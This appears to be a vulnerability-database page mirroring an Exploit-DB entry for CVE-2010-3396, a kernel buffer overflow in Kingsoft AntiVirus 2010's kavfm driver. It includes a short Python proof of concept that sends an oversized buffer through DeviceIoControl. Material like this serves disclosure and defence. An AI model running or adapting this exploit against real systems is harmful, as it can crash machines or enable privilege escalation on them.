Lucene search
+L

Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow

🗓️ 13 Sep 2010 00:00:00Reported by Lufeng LiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Kingsoft AntiVirus Kernel Buffer Overflow Exploit on Windows XPSP

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-3396
13 Sep 201000:00
circl
cve
CVE
CVE-2010-3396
15 Sep 201017:26
cve
cvelist
Cvelist
CVE-2010-3396
15 Sep 201017:26
cvelist
euvd
EUVD
EUVD-2010-3394
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-3396
15 Sep 201018:00
nvd
openvas
OpenVAS
Kingsoft Antivirus 'kavfm.sys' Buffer overflow Vulnerability
21 Sep 201000:00
openvas
openvas
OpenVAS
Kingsoft Antivirus 'kavfm.sys' Buffer overflow Vulnerability
21 Sep 201000:00
openvas
prion
Prion
Buffer overflow
15 Sep 201018:00
prion
#!/usr/bin/python

#################################################################
#
# Title: Kingsoft Antivirus Kernel Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.duba.net
# Platform: Windows XPSP3 Chinese Simplified
# Tested: Kingsoft Antivirus v2010.04.26.648
# Vulnerable: Kingsoft Antivirus <=v2010.04.26.648
# Vulnerable App: http://down10b.zol.com.cn/shadu/KAV100625_DOWN_10_166.zip?key=314e0cb9ea82720d90caae96bb918009
#################################################################
# Code :
from ctypes import *

kernel32 = windll.kernel32
Psapi    = windll.Psapi

if __name__ == '__main__':
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2

    DEVICE_NAME   = "\\\\.\\kavfm"
    dwReturn      = c_ulong()
    out_size      = 1024
    in_size       = 1024
    in_data       = ''
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
						0, None, CREATE_ALWAYS, 0, None)
    in_data=1024*'\x80'
    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x80030004, in_data,500, 0, 0,byref(dwReturn), None)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.2
EPSS0.01118
24